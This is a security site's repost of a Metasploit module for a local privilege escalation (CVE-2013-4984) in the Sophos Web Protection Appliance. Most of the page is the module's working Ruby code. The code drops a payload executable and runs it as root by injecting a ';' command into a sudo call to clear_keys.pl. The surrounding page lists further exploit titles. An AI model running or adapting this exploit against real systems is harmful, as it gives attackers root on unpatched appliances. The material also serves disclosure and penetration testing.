首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation
来源:metasploit.com 作者:vazquez 发布时间:2013-09-18  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
  
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/exe'
  
  
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
  
  def initialize(info={})
    super( update_info( info, {
      'Name'          => 'Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation',
      'Description'   => %q{
        This module abuses a command injection on the clear_keys.pl perl script, installed with the
        Sophos Web Protection Appliance, to escalate privileges from the "spiderman" user to "root".
        This module is useful for post exploitation of vulnerabilities on the Sophos Web Protection
        Appliance web ui, executed by the "spiderman" user. This module has been tested successfully
        on Sophos Virtual Web Appliance 3.7.0.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Francisco Falcon', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'Platform'       => [ 'linux'],
      'Arch'           => [ ARCH_X86 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        =>[[ 'Linux x86', { 'Arch' => ARCH_X86 } ]],
      'References'     =>
        [
          [ 'CVE', '2013-4984' ],
          [ 'OSVDB', '97028' ],
          [ 'BID', '62265' ],
          [ 'URL', 'http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities']
        ],
      'DefaultOptions' =>
        {
          "PrependFork"      => true,
          "PrependSetresuid" => true,
          "PrependSetresgid" => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 06 2013'
      }
    ))
  
    register_options([
        # These are not OptPath becuase it's a *remote* path
        OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
        OptString.new("clear_keys",  [ true, "Path to the clear_keys.pl vulnerable script", "/opt/cma/bin/clear_keys.pl" ]),
      ], self.class)
  end
  
  def check
    if file?(datastore["clear_keys"])
      return CheckCode::Detected
    end
  
    return CheckCode::Unknown
  end
  
  def exploit
    print_status("Checking actual user...")
    id = cmd_exec("id -un")
    if id != "spiderman"
      fail_with(Failure::NoAccess, "The actual user is \"#{id}\", you must be \"spiderman\" to exploit this")
    end
  
    print_status("Checking for the vulnerable component...")
    if check != CheckCode::Detected
      fail_with(Failure::NoTarget, "The vulnerable component has not been found")
    end
  
    print_status("Dropping the payload to #{datastore["WritableDir"]}")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
  
    cmd_exec "chmod +x #{exe_file}"
  
    print_status("Running...")
    begin
      # rm the file after executing it to avoid getting multiple sessions
      cmd_exec "sudo #{datastore["clear_keys"]} #{rand_text_alpha(4 + rand(4))} \";#{exe_file}; rm -f #{exe_file};\" /#{rand_text_alpha(4 + rand(4))}"
    ensure
      cmd_exec "rm -f #{exe_file}"
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sophos Web Protection Applianc
·Agnitum Outpost Internet Secur
·D-Link Devices UPnP SOAP Telne
·HP ProCurve Manager SNAC Updat
·PCMAN FTP 2.07 STOR Command -
·HP ProCurve Manager SNAC Updat
·Ofilter Player 1.2.0.1 Buffer
·Vino VNC Server 3.7.3 - Persis
·Mitsubishi MC-WorkX 8.02 Activ
·TeraCopy 2.3 (default.mo) Lang
·Vestel TV 42pf9322 - Denial of
·McKesson ActiveX File/Environm
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved